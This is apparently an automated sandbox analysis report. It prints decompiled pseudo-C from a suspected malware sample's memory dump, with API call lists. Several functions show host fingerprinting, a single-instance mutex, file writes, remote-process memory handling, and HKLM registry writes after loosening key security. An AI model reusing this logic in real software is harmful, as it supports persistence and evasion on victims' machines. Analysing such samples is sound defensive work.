    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00394A10, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 155library
    C-Code - Quality: 85%
    			E00394A10(void* __eflags) {
				short _v40;
				char _v42;
				signed short _v48;
				signed int _v316;
				intOrPtr _v320;
				char _v324;
				char _v524;
				char _v624;
				char _v824;
				char _v1024;
				_Unknown_base(*)()* _t51;
				intOrPtr _t53;
				void* _t54;
				void* _t62;
				signed int _t72;
				signed int _t73;
				intOrPtr _t83;
				intOrPtr _t84;
				intOrPtr _t86;
				void* _t100;

				_t84 =  *0x3b8628; // 0x593938
				_v324 = 0x11c;
				 *((intOrPtr*)( *((intOrPtr*)(_t84 + 0xfc))))( &_v324);
				E00399090(__eflags,  &_v524, 0x6c);
				E00396CB0( &_v624, 0xb5);
				_t86 =  *0x3b8628; // 0x593938
				_t51 = GetProcAddress( *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x24))))( &_v624),  &_v524);
				if(_t51 == 0) {
					_t83 =  *0x3b8628; // 0x593938
					_t51 =  *(_t83 + 0x3c);
				}
				 *_t51( &_v40); // executed
				_t53 = _v320;
				if(_t53 != 0xa) {
					__eflags = _t53 - 6;
					if(_t53 != 6) {
						__eflags = _t53 - 5;
						if(__eflags != 0) {
							L19:
							_t54 = 0x56;
							L20:
							E00399090(_t112,  &_v524, _t54 + 1);
							E00399090(_v40 - 9,  &_v1024, (0 | _v40 != 0x00000009) + 0x58);
							_t62 = E003A1D90(0x100, 0);
							_t100 = _t62;
							if(_t100 != 0) {
								__eflags = _v48;
								if(__eflags == 0) {
									E00399090(__eflags,  &_v824, 0xc);
									_push( &_v1024);
									E003A0C10(_t100, 0x100,  &_v824,  &_v524);
									return _t100;
								} else {
									E00399090(__eflags,  &_v824, 0x5a);
									_push(_v48 & 0x0000ffff);
									_push( &_v1024);
									E003A0C10(_t100, 0x100,  &_v824,  &_v524);
									return _t100;
								}
							} else {
								return _t62;
							}
						}
						_t72 = _v316;
						__eflags = _t72 - 2;
						if(__eflags != 0) {
							__eflags = _t72 - 1;
							if(__eflags != 0) {
								__eflags = _t72;
								_t54 = 0x55;
								if(__eflags == 0) {
									goto L20;
								}
								goto L19;
							}
							_t54 = 0x54;
							goto L20;
						}
						_t54 = 0x53;
						goto L20;
					}
					_t73 = _v316;
					__eflags = _t73 - 3;
					if(_t73 != 3) {
						__eflags = _t73 - 2;
						if(_t73 != 2) {
							__eflags = _t73 - 1;
							if(_t73 != 1) {
								__eflags = _t73;
								if(__eflags != 0) {
									goto L19;
								}
								__eflags = _v42 - 1;
								_t54 = (_t73 & 0xffffff00 | __eflags == 0x00000000) + 0x51;
								goto L20;
							}
							__eflags = _v42 - 1;
							_t54 = (0 | __eflags == 0x00000000) + 0x4f;
							goto L20;
						}
						__eflags = _v42 - 1;
						_t54 = (0 | __eflags == 0x00000000) + 0x4d;
						goto L20;
					}
					__eflags = _v42 - 1;
					_t54 = (0 | __eflags == 0x00000000) + 0x4b;
					goto L20;
				}
				_t112 = _v42 - 1;
				_t54 = (0 | _v42 == 0x00000001) + 0x49;
				goto L20;
			}























    0x00394a19
    0x00394a25
    0x00394a36
    0x00394a41
    0x00394a52
    0x00394a57
    0x00394a74
    0x00394a7c
    0x00394a7e
    0x00394a83
    0x00394a83
    0x00394a8a
    0x00394a8c
    0x00394a95
    0x00394aa8
    0x00394aab
    0x00394afe
    0x00394b01
    0x00394b2a
    0x00394b2a
    0x00394b2f
    0x00394b39
    0x00394b53
    0x00394b5f
    0x00394b64
    0x00394b6b
    0x00394b72
    0x00394b77
    0x00394bbf
    0x00394bca
    0x00394bdf
    0x00394bed
    0x00394b79
    0x00394b82
    0x00394b8b
    0x00394b92
    0x00394ba7
    0x00394bb5
    0x00394bb5
    0x00394b6d
    0x00394b71
    0x00394b71
    0x00394b6b
    0x00394b03
    0x00394b09
    0x00394b0c
    0x00394b15
    0x00394b18
    0x00394b21
    0x00394b23
    0x00394b28
    0x00000000
    0x00000000
    0x00000000
    0x00394b28
    0x00394b1a
    0x00000000
    0x00394b1a
    0x00394b0e
    0x00000000
    0x00394b0e
    0x00394aad
    0x00394ab3
    0x00394ab6
    0x00394ac6
    0x00394ac9
    0x00394ade
    0x00394ae0
    0x00394aef
    0x00394af1
    0x00000000
    0x00000000
    0x00394af3
    0x00394af9
    0x00000000
    0x00394af9
    0x00394ae4
    0x00394aea
    0x00000000
    0x00394aea
    0x00394acd
    0x00394ad4
    0x00000000
    0x00394ad4
    0x00394aba
    0x00394ac1
    0x00000000
    0x00394ac1
    0x00394a99
    0x00394aa0
    0x00000000

    APIs
    • GetProcAddress.KERNEL32(00000000), ref: 00394A74
    • GetNativeSystemInfo.KERNEL32(00000000), ref: 00394A8A
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
      • Part of subcall function 003A0C10: _vsnwprintf.MSVCRT ref: 003A0C42
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039AF00, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143
    C-Code - Quality: 88%
    			E0039AF00(void* __ebx, void* __ecx, void* __edi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				intOrPtr _t51;
				intOrPtr _t59;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				void* _t67;
				void* _t71;
				intOrPtr* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				void* _t98;
				void* _t99;
				void* _t101;
				void* _t102;
				void* _t103;

				_t101 = __ecx;
				_v8 = 0;
				_v12 = 0;
				if( *((intOrPtr*)(__ecx + 0x34)) != 0) {
					_t73 = __imp___wtoi;
					_t98 =  *_t73( *((intOrPtr*)(__ecx + 0x40)), __edi, __ebx);
					_t103 = _t102 + 4;
					__eflags = _t98 - 1;
					if(_t98 == 1) {
						_t66 = E0039DA00( *((intOrPtr*)(__ecx + 0xc)));
						__eflags = _t66;
						if(_t66 != 0) {
							_t67 = E0039DA00( *((intOrPtr*)(__ecx + 0xc)));
							__eflags =  *((intOrPtr*)(__ecx + 0x10)) - _t67;
							if( *((intOrPtr*)(__ecx + 0x10)) >= _t67) {
								 *((intOrPtr*)(__ecx + 0x10)) = 0;
							}
							E00396110(_t101, __eflags,  *((intOrPtr*)(E0039F530( *((intOrPtr*)(_t101 + 0xc)),  *((intOrPtr*)(_t101 + 0x10))))),  *((intOrPtr*)(_t68 + 4)));
							_t71 =  *_t73( *((intOrPtr*)(_t101 + 0x40)));
							_t103 = _t103 + 4;
							_t98 = _t71;
							_v12 = 1;
						}
					}
					_t46 =  *((intOrPtr*)(_t101 + 0x3c));
					__eflags = _t46;
					if(_t46 == 0) {
						L10:
						_t99 = _t98 - 1;
						__eflags = _t99 - 0x62;
						if(_t99 <= 0x62) {
							_t18 = _t99 + 0x39b0a0; // 0x5050000
							switch( *((intOrPtr*)(( *_t18 & 0x000000ff) * 4 +  &M0039B088))) {
								case 0:
									_v8 = 1;
									goto L18;
								case 1:
									__ecx = __esi;
									__eax = E00397D40(__ecx);
									goto L17;
								case 2:
									__ecx = __esi;
									__eax = E00394310(__ecx);
									goto L17;
								case 3:
									__ecx = __esi; // executed
									__eax = E00398880(__ebx, __ecx, __edi, __esi); // executed
									goto L17;
								case 4:
									__ecx = __esi;
									__eax = E00399B50(__ecx, __edi, __esi);
									L17:
									_v8 = __eax;
									goto L18;
								case 5:
									goto L18;
							}
						}
					} else {
						_t64 =  *0x3b8628; // 0x593938
						_t65 =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 8))))( *((intOrPtr*)(_t101 + 0x50)), _t46);
						__eflags = _t65;
						if(_t65 != 0) {
							goto L10;
						} else {
							_v8 = 1;
						}
					}
					L18:
					__eflags = _v12;
					if(_v12 == 0) {
						L28:
						return _v8;
					} else {
						_t48 = E0039C860(_t101);
						_t77 =  *((intOrPtr*)(_t101 + 0xc));
						__eflags = _t48 - 4;
						if(_t48 == 4) {
							_t49 = E0039F530(_t77,  *((intOrPtr*)(_t101 + 0x10)));
							_t78 =  *((intOrPtr*)(_t49 + 8));
							__eflags = _t78 - 4;
							if(_t78 <= 4) {
								 *((intOrPtr*)(_t49 + 8)) = _t78 + 1;
								_t39 = _t101 + 0x10;
								 *_t39 =  *((intOrPtr*)(_t101 + 0x10)) + 1;
								__eflags =  *_t39;
								E003916B0(_t101 + 0x30);
								goto L28;
							} else {
								_t51 =  *((intOrPtr*)(_t49 + 4));
								__eflags = _t51;
								if(_t51 != 0) {
									E0039BB40(_t51);
								}
								E0039DC80( *((intOrPtr*)(_t101 + 0xc)),  *((intOrPtr*)(_t101 + 0x10)));
								E003916B0(_t101 + 0x30);
								return _v8;
							}
						} else {
							_t59 =  *((intOrPtr*)(E0039F530(_t77,  *((intOrPtr*)(_t101 + 0x10))) + 4));
							__eflags = _t59;
							if(_t59 != 0) {
								E0039BB40(_t59);
							}
							E0039DC80( *((intOrPtr*)(_t101 + 0xc)),  *((intOrPtr*)(_t101 + 0x10)));
							E003916B0(_t101 + 0x30);
							return _v8;
						}
					}
				} else {
					return 0;
				}
			}























    0x0039af09
    0x0039af0b
    0x0039af0e
    0x0039af14
    0x0039af1f
    0x0039af29
    0x0039af2b
    0x0039af2e
    0x0039af31
    0x0039af36
    0x0039af3b
    0x0039af3d
    0x0039af42
    0x0039af47
    0x0039af4a
    0x0039af4c
    0x0039af4c
    0x0039af68
    0x0039af71
    0x0039af73
    0x0039af76
    0x0039af78
    0x0039af78
    0x0039af3d
    0x0039af7f
    0x0039af82
    0x0039af84
    0x0039afa2
    0x0039afa2
    0x0039afa3
    0x0039afa6
    0x0039afa8
    0x0039afaf
    0x00000000
    0x0039afb6
    0x00000000
    0x00000000
    0x0039afbf
    0x0039afc1
    0x00000000
    0x00000000
    0x0039afc8
    0x0039afca
    0x00000000
    0x00000000
    0x0039afd1
    0x0039afd3
    0x00000000
    0x00000000
    0x0039afda
    0x0039afdc
    0x0039afe1
    0x0039afe1
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0039afaf
    0x0039af86
    0x0039af8a
    0x0039af93
    0x0039af95
    0x0039af97
    0x00000000
    0x0039af99
    0x0039af99
    0x0039af99
    0x0039af97
    0x0039afe4
    0x0039afe4
    0x0039afea
    0x0039b080
    0x0039b087
    0x0039aff0
    0x0039aff2
    0x0039aff7
    0x0039affa
    0x0039affd
    0x0039b038
    0x0039b03d
    0x0039b040
    0x0039b043
    0x0039b072
    0x0039b075
    0x0039b075
    0x0039b075
    0x0039b07b
    0x00000000
    0x0039b045
    0x0039b045
    0x0039b048
    0x0039b04a
    0x0039b04d
    0x0039b052
    0x0039b05c
    0x0039b064
    0x0039b070
    0x0039b070
    0x0039afff
    0x0039b008
    0x0039b00b
    0x0039b00d
    0x0039b010
    0x0039b015
    0x0039b01f
    0x0039b027
    0x0039b033
    0x0039b033
    0x0039affd
    0x0039af1a
    0x0039af1a
    0x0039af1a

    APIs
    • _wtoi.MSVCRT ref: 0039AF27
      • Part of subcall function 00396110: _itow.MSVCRT ref: 0039615E
    • _wtoi.MSVCRT ref: 0039AF71
      • Part of subcall function 00394310: SHGetFolderPathW.SHELL32(00000000,0000001C,?,00000000,?), ref: 00394371
      • Part of subcall function 00398880: memset.MSVCRT ref: 003988CA
      • Part of subcall function 00398880: memset.MSVCRT ref: 003988DC
      • Part of subcall function 00398880: memcpy.MSVCRT ref: 00398E15
      • Part of subcall function 0039DC80: memcpy.MSVCRT ref: 0039DCB8
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 003916B0: memset.MSVCRT ref: 003916EE
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00393500, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
    C-Code - Quality: 100%
    			E00393500(void** __ecx, void* __eflags) {
				int _v8;
				int _v12;
				int _v16;
				char _v20;
				short _v220;
				intOrPtr _t22;
				int _t23;
				void* _t27;
				int _t28;
				intOrPtr _t29;
				intOrPtr _t38;
				void* _t45;
				void** _t46;
				void* _t48;
				struct _SECURITY_ATTRIBUTES* _t49;

				_t46 = __ecx;
				_v8 = 0;
				E00399090(__eflags,  &_v220, 0xa2);
				_t22 =  *0x3b8628; // 0x593938
				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_t22 + 0x174))))( &_v220, 1,  &_v8, 0, _t45, _t48);
				if(_t23 != 0) {
					_t49 =  &_v20;
				} else {
					_v8 = _t23;
					_t49 = 0;
				}
				_v20 = 0xc;
				_v12 = 0;
				_v16 = _v8;
				E0039F0B0( &_v220);
				_t27 = CreateMutexW(_t49, 1,  &_v220); // executed
				 *_t46 = _t27;
				_t28 = _v8;
				if(_t28 != 0) {
					_t38 =  *0x3b8628; // 0x593938
					 *((intOrPtr*)( *((intOrPtr*)(_t38 + 0x9c))))(_t28);
				}
				if( *_t46 == 0) {
					ExitProcess(0);
				}
				_t29 =  *0x3b8628; // 0x593938
				return 0 |  *((intOrPtr*)( *((intOrPtr*)(_t29 + 0x30))))() == 0x000000b7;
			}


















    0x00393517
    0x00393519
    0x00393520
    0x00393525
    0x00393542
    0x00393546
    0x0039354f
    0x00393548
    0x00393548
    0x0039354b
    0x0039354b
    0x0039355c
    0x00393563
    0x0039356a
    0x0039356d
    0x0039358b
    0x0039358d
    0x0039358f
    0x00393594
    0x00393596
    0x003935a3
    0x003935a3
    0x003935aa
    0x003935ae
    0x003935ae
    0x003935b4
    0x003935cd

    APIs
      • Part of subcall function 0039F0B0: memset.MSVCRT ref: 0039F0CE
      • Part of subcall function 0039F0B0: GetWindowsDirectoryW.KERNEL32(?,00000208), ref: 0039F0E2
      • Part of subcall function 0039F0B0: GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0039F11E
    • CreateMutexW.KERNELBASE(?,00000001,?), ref: 0039358B
    • ExitProcess.KERNEL32 ref: 003935AE
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039E520, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53com
    C-Code - Quality: 100%
    			E0039E520(intOrPtr* __ecx) {
				void* _v8;
				void* _t15;
				void* _t16;
				intOrPtr* _t18;
				intOrPtr* _t20;
				intOrPtr* _t22;
				intOrPtr _t28;
				void* _t36;

				_t1 = __ecx + 8; // 0x8
				 *__ecx = 0x3b32c8;
				E00392750(_t1);
				_t2 =  &_v8; // 0x396a37
				_t15 = E00396D20(_t2);
				_t28 =  *0x3b8628; // 0x593938
				_t16 =  *((intOrPtr*)( *((intOrPtr*)(_t28 + 0x1c4))))(0x3b32cc, 0, 1, 0x3b32dc, _t15, _t36, __ecx); // executed
				if(_t16 < 0) {
					 *((intOrPtr*)(__ecx + 4)) = 0;
					return __ecx;
				} else {
					_t18 = _v8;
					 *((intOrPtr*)( *((intOrPtr*)( *_t18 + 0xfc))))(_t18, 0);
					_t20 = _v8;
					 *((intOrPtr*)( *((intOrPtr*)( *_t20 + 0x110))))(_t20, 0);
					_t22 = _v8;
					 *((intOrPtr*)( *((intOrPtr*)( *_t22 + 0x118))))(_t22, 0);
					 *((intOrPtr*)(__ecx + 4)) = _v8;
					return __ecx;
				}
			}











    0x0039e527
    0x0039e52a
    0x0039e530
    0x0039e535
    0x0039e539
    0x0039e53e
    0x0039e55c
    0x0039e560
    0x0039e59f
    0x0039e5ac
    0x0039e562
    0x0039e562
    0x0039e570
    0x0039e572
    0x0039e580
    0x0039e582
    0x0039e590
    0x0039e595
    0x0039e59e
    0x0039e59e

    APIs
    • CoCreateInstance.OLE32(003B32CC,00000000,00000001,003B32DC,00000000,00396A37,?,00000000), ref: 0039E55C
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00391A80, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45file
    C-Code - Quality: 100%
    			E00391A80(void* __ecx, WCHAR* _a4, void* _a8, long _a12) {
				long _v8;
				void* _t10;
				int _t14;
				intOrPtr _t23;
				long _t25;
				void* _t28;

				_t25 = 0;
				_v8 = 0;
				_t10 = CreateFileW(_a4, 0xc0000000, 1, 0, 2, 0x80, 0); // executed
				_t28 = _t10;
				if(_t28 != 0xffffffff) {
					_t14 = WriteFile(_t28, _a8, _a12,  &_v8, 0); // executed
					if(_t14 != 0) {
						_t25 = 1;
					}
					_t23 =  *0x3b8628; // 0x593938
					 *((intOrPtr*)( *((intOrPtr*)(_t23 + 0xf8))))(_t28);
				}
				return _t25;
			}









    0x00391a8f
    0x00391aa1
    0x00391aab
    0x00391aad
    0x00391ab2
    0x00391acd
    0x00391ad1
    0x00391ad3
    0x00391ad3
    0x00391ad8
    0x00391ae5
    0x00391ae5
    0x00391aee

    APIs
    • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,0000001F,00000000,00391BCA,?,003A171D,?,00391BCA,?,?), ref: 00391AAB
    • WriteFile.KERNEL32(00000000,?,00391BCA,000000CC,00000000,?,003A171D,?,00391BCA,?,?,000000CC), ref: 00391ACD
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00392DF0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
    C-Code - Quality: 100%
    			E00392DF0(struct _SECURITY_ATTRIBUTES** __ecx, void* __eflags) {
				short _v204;
				signed char _t16;
				intOrPtr _t27;
				struct _SECURITY_ATTRIBUTES** _t29;

				_t29 = __ecx;
				 *__ecx = 0;
				__ecx[1] = 0;
				__ecx[2] = 0;
				__ecx[3] = 0;
				E00399090(__eflags,  &_v204, 0x71);
				_t16 = GetFileAttributesW( &_v204); // executed
				if(_t16 != 0xffffffff) {
					__eflags = _t16 & 0x00000010;
					if((_t16 & 0x00000010) == 0) {
						__eflags =  *0x3b8580;
						if( *0x3b8580 == 0) {
							_t27 =  *0x3b8628; // 0x593938
							 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0xa4))))( &_v204);
							goto L6;
						}
					}
				} else {
					if( *0x3b8580 == 0) {
						L6:
						CreateDirectoryW( &_v204, 0); // executed
					}
				}
				return _t29;
			}







    0x00392dfa
    0x00392e05
    0x00392e0b
    0x00392e12
    0x00392e19
    0x00392e20
    0x00392e3b
    0x00392e40
    0x00392e4d
    0x00392e4f
    0x00392e51
    0x00392e58
    0x00392e5a
    0x00392e6d
    0x00000000
    0x00392e6d
    0x00392e58
    0x00392e42
    0x00392e49
    0x00392e6f
    0x00392e81
    0x00392e81
    0x00392e49
    0x00392e89

    APIs
    • GetFileAttributesW.KERNELBASE(?,?,?), ref: 00392E3B
    • CreateDirectoryW.KERNELBASE(?,00000000,?,?), ref: 00392E81
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00391140, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17
    C-Code - Quality: 100%
    			E00391140(char _a4, void* _a8, long _a12, long _a16) {
				void* _t6;
				int _t8;

				_t6 = _a8;
				if(_t6 != 0) {
					_t5 =  &_a4; // 0x397a34
					_t8 = VirtualFreeEx( *_t5, _t6, _a12, _a16); // executed
					return _t8;
				}
				return _t6;
			}





    0x00391143
    0x00391148
    0x0039115c
    0x00391160
    0x00000000
    0x00391160
    0x00391163

    APIs
    • VirtualFreeEx.KERNELBASE(4z9,?,00000000,00000000,?,003979B2,?,?,00000000,00008000,00000000,00000000,00000000,00000000,?,00397A34), ref: 00391160
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 00391B20, Relevance: 5.1, APIs: 4, Instructions: 62
    C-Code - Quality: 93%
    			E00391B20(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _t22;
				struct _SECURITY_ATTRIBUTES** _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				void* _t29;
				void* _t37;
				intOrPtr _t39;
				void* _t43;

				_t43 = __eflags;
				_t37 = __edx;
				_t39 = __ecx;
				E00392750(__ecx + 0x4f4);
				E00395000(__ecx + 0x4fc);
				 *((intOrPtr*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				 *((intOrPtr*)(__ecx + 0x20)) = 0;
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				memset(__ecx + 0x30, 0, 0x2c);
				_t29 = _t39 + 0x5c;
				memset(_t29, 0, 0x498); // executed
				_t22 = E00394A10(_t43); // executed
				 *((intOrPtr*)(_t39 + 0x24)) = _t22;
				_t23 = E0039F0A0();
				_push(0x10);
				 *((intOrPtr*)(_t39 + 0x1c)) = _t23;
				L0039A47E();
				_t44 = _t23;
				if(_t23 == 0) {
					_t24 = 0;
					__eflags = 0;
				} else {
					_t24 = E00392DF0(_t23, _t44); // executed
				}
				 *((intOrPtr*)(_t39 + 4)) = _t24;
				_push(0x10);
				 *((intOrPtr*)(_t24 + 8)) = _t39;
				L0039A47E();
				if(_t24 == 0) {
					_t25 = 0;
					__eflags = 0;
				} else {
					_t25 = E0039CBF0(_t24, 0xc);
				}
				 *((intOrPtr*)(_t39 + 0xc)) = _t25;
				 *_t29 = 0;
				 *((intOrPtr*)(_t39 + 0x60)) = 0;
				 *((intOrPtr*)(_t39 + 0x4ec)) = 1;
				E003A14A0(_t39); // executed
				E0039CE00(_t39, _t37); // executed
				return _t39;
			}











    0x00391b20
    0x00391b20
    0x00391b22
    0x00391b2b
    0x00391b36
    0x00391b44
    0x00391b47
    0x00391b4a
    0x00391b4d
    0x00391b50
    0x00391b53
    0x00391b5d
    0x00391b62
    0x00391b67
    0x00391b6c
    0x00391b6f
    0x00391b74
    0x00391b76
    0x00391b79
    0x00391b81
    0x00391b83
    0x00391b8e
    0x00391b8e
    0x00391b85
    0x00391b87
    0x00391b87
    0x00391b90
    0x00391b93
    0x00391b95
    0x00391b98
    0x00391ba2
    0x00391baf
    0x00391baf
    0x00391ba4
    0x00391ba8
    0x00391ba8
    0x00391bb3
    0x00391bb6
    0x00391bb8
    0x00391bbb
    0x00391bc5
    0x00391bcc
    0x00391bd6

    APIs
    • memset.MSVCRT ref: 00391B53
    • memset.MSVCRT ref: 00391B62
      • Part of subcall function 00394A10: GetProcAddress.KERNEL32(00000000), ref: 00394A74
      • Part of subcall function 00394A10: GetNativeSystemInfo.KERNEL32(00000000), ref: 00394A8A
    • ??2@YAPAXI@Z.MSVCRT ref: 00391B79
    • ??2@YAPAXI@Z.MSVCRT ref: 00391B98
      • Part of subcall function 003A14A0: wsprintfW.USER32 ref: 003A1639
      • Part of subcall function 003A14A0: rand.MSVCRT ref: 003A1690
      • Part of subcall function 0039CE00: _time64.MSVCRT ref: 0039CE12
      • Part of subcall function 0039CE00: _time64.MSVCRT ref: 0039CE59
      • Part of subcall function 00392DF0: GetFileAttributesW.KERNELBASE(?,?,?), ref: 00392E3B
      • Part of subcall function 00392DF0: CreateDirectoryW.KERNELBASE(?,00000000,?,?), ref: 00392E81
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003B0790, Relevance: 5.1, APIs: 4, Instructions: 55
    C-Code - Quality: 100%
    			E003B0790(short* __edi, char __esi, void* __eflags) {
				void _v516;
				void* __ebx;
				void* _t18;
				void* _t19;
				void* _t29;

				_t29 = __eflags;
				memset( &_v516, 0, 0x200);
				E00399090(_t29,  &_v516, 0xc8);
				_t19 =  &_v516;
				E003B0640(_t19, __edi, __esi); // executed
				memset(_t19, 0, 0x200);
				E00399090(_t29, _t19, 0xc9);
				_t12 =  &((StrStrW(_t19, 0x3b32c4))[1]);
				E0039F630(0x80000002,  &((StrStrW(_t19, 0x3b32c4))[1])); // executed
				E003B0640(_t19, __edi, __esi); // executed
				memset(_t19, 0, 0x200);
				E00399090(_t12, _t19, 0xca);
				_t18 = E003B0640(_t19, __edi, __esi); // executed
				return _t18;
			}








    0x003b0790
    0x003b07a8
    0x003b07b9
    0x003b07c0
    0x003b07c6
    0x003b07d5
    0x003b07e2
    0x003b07f8
    0x003b0801
    0x003b0808
    0x003b0817
    0x003b0824
    0x003b082b
    0x003b0837

    APIs
    • memset.MSVCRT ref: 003B07A8
      • Part of subcall function 003B0640: StrChrW.SHLWAPI(?,0000005C), ref: 003B0673
      • Part of subcall function 003B0640: RegOpenKeyExW.KERNEL32(80000002,-00000002), ref: 003B0688
      • Part of subcall function 003B0640: GetSecurityInfo.ADVAPI32(?,00000004,00000004,00000000,00000000,00000000,00000000,00000000), ref: 003B06AD
      • Part of subcall function 003B0640: StrChrW.SHLWAPI(?,0000005C), ref: 003B06D6
      • Part of subcall function 003B0640: RegOpenKeyExW.KERNEL32(80000002,-00000002), ref: 003B06F1
      • Part of subcall function 003B0640: RegSetValueExW.KERNEL32(?,?,00000000,00000004,?,00000004), ref: 003B0716
      • Part of subcall function 003B0640: SetNamedSecurityInfoW.ADVAPI32(?,00000004,00000004,00000000,00000000,?,00000000), ref: 003B0732
    • memset.MSVCRT ref: 003B07D5
    • StrStrW.SHLWAPI(?,003B32C4), ref: 003B07F2
      • Part of subcall function 0039F630: memset.MSVCRT ref: 0039F660
